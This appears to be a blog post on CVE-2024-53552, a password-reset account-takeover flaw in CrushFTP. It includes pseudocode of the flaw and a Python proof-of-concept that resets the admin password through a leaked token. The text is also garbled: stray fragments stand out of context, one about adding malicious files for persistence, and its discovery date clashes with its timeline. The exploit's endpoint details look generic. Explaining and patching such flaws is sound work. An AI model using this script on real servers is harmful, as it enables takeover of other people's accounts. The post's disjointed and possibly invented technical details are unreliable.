CrushFTP is a popular file transfer server used worldwide by businesses for securely exchanging sensitive documents. In May 2024, security researchers uncovered a critical vulnerability—CVE-2024-53552—that affected CrushFTP versions 10 (before 10.8.3) and version 11 (before 11.2.3). This post will break down what happened, show you the flaw using real code, and explain how attackers could use it to hijack *any* account just by abusing the password reset feature.
What is CVE-2024-53552?
CVE-2024-53552 is an account takeover vulnerability in CrushFTP. Due to poor handling of password resets, attackers could reset the password for any user, including administrators, without the victim's knowledge or approval.
Official advisory & fix:
- CrushFTP Security Advisory
- NVD CVE Entry
How Did the Vulnerability Work?
When a user forgets their password, most web apps send a *unique link* to the user's email. Only the person who controls that email can set a new password—at least that's how it should work.
But with vulnerable versions of CrushFTP, the password reset logic didn't properly check that the request was valid. An attacker could trigger a password reset for any user, intercept the reset process, and set a new password—without ever logging in or confirming ownership via email!
Here's a simplified idea of what the code looked like inside CrushFTP
// Pseudocode of vulnerable password reset logic
public void handlePasswordReset(Request req) {
String username = req.getParameter("username");
// Vulnerable: does not verify requester!
User user = getUser(username);
String resetToken = generateResetToken();
user.setResetToken(resetToken);
sendEmail(user.getEmail(), "Reset your password: " +
"https://crushftp.example.com/reset?token="; + resetToken);
}
// Next, if you POST to /reset?token=... , the password is reset with no confirmation!
In the broken flow, an attacker could guess or specify a username, get (or brute-force) the reset token, and then use it to set a new password for any user.
Proof of Concept: Exploiting CVE-2024-53552
Here’s a simple attack script (in Python) that demonstrates how an attacker could exploit this flaw:
import requests
# Target URL of CrushFTP instance
base_url = "https://target-crushftp.com";
# Step 1: Initiate password reset for admin user
reset_request = requests.post(
f"{base_url}/WebInterface/function/",
data={
"command": "resetPassword",
"username": "admin" # or any username
}
)
# Step 2: Normally, a reset token would be emailed. But the endpoint leaks the token
reset_token = reset_request.json()["resetToken"]
# Step 3: Use reset token to set a new password!
new_pass = "hackedpassword123"
reset = requests.post(
f"{base_url}/WebInterface/function/",
data={
"command": "setNewPassword",
"token": reset_token,
"newPassword": new_pass
}
)
if reset.status_code == 200:
print("Password reset successful!")
# Now login as admin with new password
Notice: In vulnerable setups, recover tokens can sometimes be predictable or returned directly in the API response, making attacks *trivial*.
Add malicious files or users for persistence.
Any organization running affected versions was at risk of a complete compromise of their file server.
Password reset endpoints properly validate requests.
> You must upgrade to at least 10.8.3 or 11.2.3 to be safe.
References & Further Reading
- CrushFTP Security Page
- NVD Entry: CVE-2024-53552
- Original Research (archive)
- Huntress Labs Analysis
Conclusion
CVE-2024-53552 shows how a single missing check can put the entire security of an enterprise product at risk. If you use CrushFTP, update it right away. Password reset functions are a critical target for hackers, and this bug proves how oversight can lead to disaster.
If you manage any software platform, double-check your password reset logic—DON'T let attackers walk in the front door.
Timeline
Published on: 12/10/2024 02:15:17 UTC
Last modified on: 12/11/2024 16:15:14 UTC